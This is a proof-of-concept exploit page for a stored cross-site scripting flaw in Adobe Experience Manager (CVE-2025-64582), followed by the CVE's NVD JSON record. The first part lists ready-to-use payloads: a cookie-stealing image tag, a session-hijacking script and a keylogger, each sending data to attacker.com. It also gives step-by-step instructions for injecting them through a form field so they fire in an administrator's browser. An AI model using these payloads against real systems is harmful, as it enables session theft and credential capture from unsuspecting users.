CVE-2025-64582

<!-- CVE-2025-64582 Stored XSS PoC for Adobe Experience Manager --> <!-- Inject this payload into a form field that is later displayed to users --> <!-- Basic XSS payload --> <script>console.log('XSS Triggered');alert('CVE-2025-64582')</script> <!-- Cookie stealing payload --> <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> <!-- Session hijacking payload --> <script> var img = new Image(); img.src = 'https://attacker.com/log?data=' + encodeURIComponent(document.cookie + '|' + document.location.href); </script> <!-- Keylogger payload --> <script> document.addEventListener('keypress', function(e) { fetch('https://attacker.com/keys?k=' + e.key); }); </script> <!-- Steps to exploit: 1. Authenticate as a low-privileged user 2. Navigate to a form page in AEM 3. Fill in a text field with one of the payloads above 4. Submit the form 5. Wait for an admin or other user to view the page containing the malicious content 6. The JavaScript will execute in the victim's browser -->

{"cve": {"id": "CVE-2025-64582", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:21.610", "lastModified": "2025-12-12T18:17:24.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}